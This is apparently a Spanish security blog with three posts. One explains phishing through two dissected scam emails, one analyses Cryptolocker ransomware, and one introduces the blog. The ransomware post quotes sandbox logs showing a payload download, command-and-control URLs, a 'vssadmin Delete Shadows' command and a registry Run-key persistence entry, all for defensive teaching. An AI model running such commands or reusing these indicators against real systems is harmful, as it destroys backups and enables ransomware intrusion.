El ciberfraude (Phishing)

En nuestro día a día ha sido común el escuchar de: familiares, amigos,compañeros de trabajo, colegas etc. Sobre correos electrónicos que han recibido ofreciendo les:

• Jugosas remuneraciones económicas
• Retenciones monetarias en sus cuentas bancarias.
• Solicitudes sobre cambios de sus credenciales bancarias
• Herencias ofrecidas por desconocidos
• Atrasos en sus contribuciones al erario público.
• ETC 

 Sin embargo todas y cada una de estos correo electrónicos son herramientas utilizadas por personas mal intencionadas que buscan poder tener acceso a información sensible o personal (Personally identifiable information (PII), or Sensitive Personal Information (SPI) por sus siglas en inglés) de la víctima especialmente la de sus cuentas bancarias.

De acuerdo al informe de Kaspersky sobre Spam y Phishing. Durante el primer trimestre de 2015, los productos de Kaspersky Lab registraron 50.077.057 reacciones del sistema antiphishing, lo que supone un aumento de un millón con respecto al último trimestre de 2014, según el Informe de Spam y Phishing de Q1 de la compañía.*

Se desconoce el impacto monetario ocurrido en México durante el 2015, sin embargo en México durante el año 2013 la cifra en perdidas fue de 3000 millones de dollars.** ¡Alarmante no creen!

¿Qué es el phishing?

El phishing o señuelo no es considerado un malware aun que muchas veces nos dirigimos a él como tal. De acuerdo al NIST 800-83, el phishing es un método implementado por personas anómalas para redirigir la navegación de sus víctimas hacia sitios clonados o ficticios como por ejemplo: un portal bancario, un portal de una red social o de una institución gubernamental con el objetivo de robar su información personal y/o sensible.

El método más común implementado es el envío de correos electrónicos masivos por ejemplo:

Correo Buenos días muy costoso (e)

Correo de aviso de Whatsapp VoiceMail

¿Alguno de ustedes los abriría? Pues a quién no le caería bien recibir de una mujer "supuesta mente en su lecho de muerte" 850,000 Euros o quién hoy en día no es un obsesionado con la mensajería instantánea de WhastApp y le llamaría mucho la atención el saber ¿quién le dejo un buzón de voz?.

La disección a Phishing.

Primer caso: WhastApp voicemail.

Este caso lo vamos a matar muy rápido con el siguiente mensaje directamente del fabricante de la aplicación:

"Primero, es importante entender que no te enviamos mensajes por WhatsApp. Tampoco te enviamos correos electrónicos sobre los chats, los Mensajes de voz, el sistema de pago, los cambios en la aplicación, o multimedia como fotos y vídeos. Solo recibirás un correo de WhatsApp si nos enviaste un correo a uno de nuestras direcciones de correo electrónico, como las del Equipo de Soporte."***

Sin la necesidad de investigar más afondo el coreo podemos concluir entonces que se trata de un correo fraudulento y no es emitido por whastapp.

Segundo caso: Buenos días muy costoso (e)

 Antes de revisar los encabezados del correo podemos hacer las siguientes deducciones de acuerdo a la redacción:

1.  Fecha de nacimiento. La persona debe tener al rededor de 69 ya que su fecha de nacimiento es el  15 de Julio 1946 y la foto que nos muestran es de una persona de edad avanzada.
2. Es de nacionalidad francesa y su redacción en el correo esta muy revuelta o confusa pero es capas de sobresaltar la cantidad ofrecida, su correo electrónico y sobre todo sus agradecimientos al termino de su mensaje.
3. Hay que poner nos a pensar un poco: "En verdad tendré tanta suerte para que una mujer de 69 años me quiera heredar 850,000 euros (14,968,500 de pesos mexicanos). ¡Es mejor que sacar se la lotería!" 

Poniéndonos un poco más técnicos y revisando el código fuente del correo encontramos los siguiente:

• smtp server IP is 195.238.20.111

·         mtp.mailfrom=mb580177@skynet.be

·         header.id=mb580177@skynet.be

·         Received: from mailsec115.isp.belgacom.be ([195.238.20.111])

·         From: URGENTE <mb580177@skynet.be>

·         To: irenelangley@talktalk.net

·         Message-ID: <865594771.560733.1445970879209.open-xchange@webmail.nmp.proximus.

En ningún momento de la cabecera se ve que el correo provenga directamente de la cuenta de  hippolyte.perry@hotmail.com, el SMTP no es el de hotmail al contrario esta localizado en Bélgica y la cuenta origen es del sitio skynet.be.

No desestimo que al descargar las imágenes adjuntas en el correo tengan algún tipo de Virus ya que sus cabeceras indican los siguiente:

------=_Part_560731_1657796776.1445970879204
Content-Type: image/jpeg; name=12179944_1666066683637228_1639812940_n.jpg
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename=12179944_1666066683637228_1639812940_n.jpg <--- Por que una imagen tiene un nombre tan extraño.

------=_Part_560731_1657796776.1445970879204
Content-Type: image/gif; name=image002.gif
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=image002.gif 

En Conclusión el correo es una trampa para que la víctima caiga en un ciberfraude, envíe información relevante comprometiendo así la integridad y seguridad de sus datos.
 

Como evitar el phishing

1. Nunca abran correo electrónicos de personas desconocidas.
2.  Si te llego algún correo de instituciones bancarias o SAT no respondas inmediatamente, contacta al centro de atención y corrobora que sea legitimo. 
3. Cuenta con un sistema de Antivirus instalado y actualizado en tu ordenador por si de casualidad abriste el correo y descargaste algún objeto embebido.

* Dato obtenido de http://latam.kaspersky.com/mx/node/18463
** Dato obtenido de http://mexico.cnn.com/tecnologia/2014/06/03/mexico-entre-los-paises-latinoamericanos-mas-afectados-por-el-cibercrimen
***Dato tomado de https://www.whatsapp.com/faq/es/general/28030005

Cryptolocker una amenaza cotidiana

Recientemente los delitos informáticos, malware y robo de información o identidad han sido un trend topic en Internet en lo que ha sido este año 2015. El día de hoy me daré a la tarea de publicar de manera flexible a través de este portal el comportamiento común de un Blended Attack que ha infectado a miles de servidores, estaciones de trabajo y equipo personal al rededor del mundo y conocido como Cryptolocker.

¿Qué es un Cryptolocker?

 Un Cryptolocker es un pieza de código malintencionado que tiene el objetivo de cifrar los documentos alojados en un host, algunos de las extensiones que más ataca el malware de manera enunciativa más no limitativa son: .doc, .docx, .xls, .xlsx, .txt, .pdf, .ppt, .pptx, etc. Una vez cifrados los documentos el usuario recibe una alerta de notificación en la cual se advierte que su información ha sido "secuestrada" y para poder realizar la recuperación de su información deberá de pagar un "rescate" que va desde una tarifa inicial de 100 US/Eur hasta 500 US/Eur. El pago puede ser emitido a través de dinero electrónico mejor conocido como Bitcoins, transferencias bancarias o en persona.


El monto de la tarifa inicial de rescate aumenta conforme ha transcurrido el plazo de tiempo limite de pago estipulado por los atacantes para recuperar tu información. A continuación un ejemplo:

 

Este tipo de delito informático en el último trimestre del 2014 logro infectar a más de 650,000 víctimas al rededor del mundo, cifro 5.25 billones de archivos y obtuvo una remuneración de hasta 1.1 millones*. En el 2015 esta cifra será superada y por mucho.

¿ Cómo funciona?

 Existen varios métodos o aristas que los usuarios anómalos pueden utilizar para engañar al host o usuario y que estos a su vez instalen el malware. Algunos de los mecanismos más comunes implementados por los atacantes pueden ser:

1. Cookie tracking (Mecanismo implementado para adquirir el comportamiento de navegación de un usuario usualmente instalado en las barras de búsqueda de los exploradores de Internet)
2. Phishing (Envió de correos falsos)
3. Trojanos (software que parece legitimo pero no lo es)
4. Sitios ficticios o clonados.

 El usuario no percibe a simple vista la descarga o instalación del código malicioso ya que esté va explícitamente inscrito en el payload HTTP y se ejecuta en el background del ordenador a continuación un ejemplo claro de lo que ocurre:

Uac

Service

Background Intelligent Transfer Service

GET	/administrator/components/com_content/views/3010crypt.exe HTTP/1.1	Server	Apache/2
Cache-Control	no-cache	Last-Modified	Thu, 19 Nov 2015 13:07:51 GMT
Connection	close	ETag	"4d060e-22800-524e4723877c0"
Pragma	no-cache	Accept-Ranges	bytes
User-Agent	Mozilla/4.0	Content-Length	141312
Host	mathmf.com	Connection	close
HTTP	1.1 200 OK	Content-Type	application/x-msdownload
Date	Thu, 19 Nov 2015 16:17:24 GMT

 Como todo buen malware el archivo binario se aloja y ejecuta en carpetas con permisos privilegiados como por ejemplo en el caso de windows es la carpeta Temp, una vez alojado en la carpeta privilegiada el archivo muta a una versión diferente para que los mecanismo de protección como los es un Antivirus les sea más difícil detectarlo.

El siguiente paso sería contactar a los servidores de Command and Control para enviar información relevante sobre el equipo tal como puede ser:

1. El nombre de la máquina
•  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName
2. El tipo de sistema operativo y su versión
•  \REGISTRY\USER\S-1-5-21-XXXXXXXXX\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

El servidor Command and Controll recibe la información, la procesa y envía comandos específicos al malware para comenzar a cifrar la información a continuación una muestra de los intentos de conexión hacia los equipos de comando y control:

TCP_MISS/200 GET http://kremasi.com/cgi-sys/suspendedpage.cgi? HIER_DIRECT/119.82.226.8
TCP_MISS/200 POST http://doormattx.com/CDography/images/1.php? HIER_DIRECT/205.134.238.142
TCP_MISS/200 POST http://familyiqblog.com/wp-content/themes/twentyeleven/3.php? HIER_DIRECT/199.101.183.130
TCP_MISS/200 POST http://gibaralawplus.com/1.php? HIER_DIRECT/104.18.45.110
TCP_MISS/200 POST http://id-protect.org/wp-admin/css/1.php? HIER_DIRECT/208.92.162.53
TCP_MISS/200 POST http://konutturk.net/1.php? HIER_DIRECT/5.250.245.39
TCP_MISS/200 POST http://mejdu.com/themes/default-bootstrap/3.php? HIER_DIRECT/217.174.156.20
TCP_MISS/200 POST http://normi-int.com/contact_form/1.php? HIER_DIRECT/103.11.75.15
TCP_MISS/200 POST http://shsbrawley.org/Pics/_notes/3.php? HIER_DIRECT/192.254.224.91
TCP_MISS/200 POST http://soznanie.net/1.php? HIER_DIRECT/192.187.108.171
TCP_MISS/200 POST http://thornhillmovers.net/back-up/cgi-bin/1.php? HIER_DIRECT/192.185.233.169
TCP_MISS/200 POST http://warnaaseliprinting.com/css/themes/2.php? HIER_DIRECT/182.253.224.219

En este punto el malware recibe la llave publica para comenzar el cifrado de los archivos así como también realizar tareas de: limpieza, robo de información, mutación para pasar de ser inapercibido entre otras tareas. Estas actividades pueden hacer imposible la recuperación de la información:

Comienzo de cifrado a través de API propietarias de windows***:

  API Name:  CryptAcquireContextW   Address:  0x00407036
  Params:  [NULL, NULL, 1, 4026531840]
  Imagepath:  C:\Documents and Settings\admin\Local Settings\Temp\3010crypt.exe   DLL Name:  advapi32.dll

Borrado de información permanente del sistema***:

C:\WINDOWS\system32\vssadmin.exe
  Parentname:  C:\WINDOWS\explorer.exe
  Command Line:  vssadmin.exe Delete Shadows /All /Quiet
  MD5:  cdf76989d9fe20b7cc79c9c3f7ba2d4c
  SHA1: 3eb0e4bf445a5adc70394a4ba6fd5631c64396ca

Revisa y roba información sobre el historial de navegación del usuario***:

C:\Documents and Settings\admin\Local Settings\History\History.IE5\index.dat

Mutación y ejecución del malware al iniciar la computadora***:

C:\Users\Administrator\AppData\Roaming\b849c42\466fc57fa.exe  <-- Nuevo archivo

\REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Run\"b849c42" = C:\Users\Administrator\AppData\Roaming\b849c42\466fc57fa.exe  <-- Inico del código al prender el ordenador

¿Cómo podemos evitarlo?

 Matemáticamente es complicado realizar la recuperación de los archivos una vez cifrados ya que por lo regular el malware es programado para cifrar los archivos con algoritmos sofisticados y robustos como lo es RSA a 2048bits por lo que tardaríamos años en poder descifrar la clave. Pagar por el rescate de los datos tampoco es garantía de recuperación ya que como toda persona mal intencionada los atacantes no se conforman con poco así que es probable que exijan mayores pagos al poner se en contacto con el usuario afectado.

Recomendaciones de seguridad para minimizar un posible contagio. 

 Algunas medidas, controles y recomendaciones que podemos tomar en consideración para recuperar la información de acuerdo al NIST 800.83 y con base a mi experiencia obtenida durante los años que llevo en el campo de la seguridad informática son:

1. Para el caso de compañías: 
• Trabajar en un proceso de respuesta a incidentes que permita actuar ante una amenaza de malware y poder realizar su contención, remediación y principalmente la recuperación de información de los datos**.
• Concientización de sus trabajadores sobre el uso adecuado de los activos que la compañía les provee.
2. Para el caso de usuarios:
• Realizar respaldos de su información en dispositivos externos como puede ser una USB o disco duro externo.
• No abrir correos de destinatarios desconocidos y mucho menos si están en otro idioma ( "La curiosidad mato al gato" ).
• No descargar programas de sitios desconocidos o sospechosos, realicen la descarga de sitios legítimos de los propietarios de las aplicaciones.
• Utilicen controles de seguridad como un sistema de protección antimalware, mantener los actualizado y programado para ejecutar revisiones por lo menos dos veces a la semana (Antivirus)
• Si llegan a tener un problema o incidente no traten de corregirlo por si mismos acudan a un centro de ayuda o con una persona especializada en la materia. ( sin ofender pero aveces los cafes internet son pequeños enjambres de virus por lo que tu equipo puede salir peor de lo que entro).

* Dato tomado de scmagazine.com
** Dato tomado de la publicación especial de NIST 800-83 Guide to Malware Incident Prevention and Handling
*** FireEye NX appliance

Introducción del blog

El presente blog tiene la finalidad de informar a través de publicaciones a todos los usuarios e interesados en el blog sobre: amenazas, malware, conceptos y mejoras en la seguridad de nuestros ordenadores y datos personales. Esta dirigido a especialistas en seguridad informática y a usuarios en general.

Me deslindo completamente sobre cualquier actividad o mal uso que los lectores le puedan dar a mis publicaciones ya que los artículos publicados tiene la finalidad de esparcir el conocimiento adquirido así como ser educativos.

Be safe!